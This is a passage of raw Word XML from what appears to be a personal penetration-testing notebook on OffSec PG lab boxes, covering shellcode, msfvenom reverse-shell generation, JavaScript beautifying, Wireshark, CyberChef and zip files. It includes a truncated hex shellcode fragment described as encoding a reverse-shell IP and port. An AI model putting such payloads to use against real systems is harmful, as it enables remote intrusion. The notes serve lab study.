        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Despite its name, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode doesn't always spawn a shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but historically, its purpose was to open a command shell (like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Windows) so an attacker could execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000371F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, this part:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003720">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\xcb\x48\xcb\x56\xc7\x44\x24\x04\x02\x00\x11\x5c...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the binary sequence the machine will execute, and somewhere inside, encoded in network byte order, is the IP and port you specified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003722">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003723">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Msfvenom seems to be very popular for generating reverse shells in shell code format that are to be placed in the POC for shellcode in exploitdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003724">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003725">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hexadecimal shellcode:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003726">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1160">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Internal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, they had a hexadecimal shellcode (it was supposed to give a reverse shell), but inside that shell code they have to edit the IP and port number of the payload to make sure the reverse shell connects to right port. So look at the write up for how to navigate that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003727">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1161">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">another</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> write up for that too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003728">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003729">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alphanumeric Shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1162">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Kevin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they had a shellcode payload that needed alphanumeric encoding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1163">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writeup for that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000372F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see some more shellcode stuff in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1164">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Osaka</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730">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373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32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003733">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003734">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7mfwt14wf70c" w:id="494"/>
      <w:bookmarkEnd w:id="494"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003735">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003736">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have javascript (JS) source code, you can use this website and copy/paste your code to make it look good:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003737">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1165">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://beautifier.io/</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738">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003739">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jjitu5neqr03" w:id="495"/>
      <w:bookmarkEnd w:id="495"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark was seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1166">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Payday</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice and it found a password but it ended up being a useless password. It was for a FTP login. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000373E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003741">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003742">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_eh3umgq3eo5h" w:id="496"/>
      <w:bookmarkEnd w:id="496"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyberchef</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003743">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003744">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyberchef link </w:t>
      </w:r>
      <w:hyperlink r:id="rId1167">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1168">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gchq.github.io/CyberChef/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003745">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003746">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, as seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1169">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we have to decode twice. Like in this box, we had to decode binary twice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003747">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003748">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2387600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="408" name="image411.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image411.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1170"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2387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49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037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4B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bfgzp4n09lac" w:id="497"/>
      <w:bookmarkEnd w:id="497"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zip (.zip)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In XXXXXXXXX-A Challenge Lab for machine 192.168.xxx.144, we try unzipping but we it skipped a bunch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4833484" cy="3338513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="206" name="image208.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image208.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1171"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4833484" cy="3338513"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000374F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003750">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
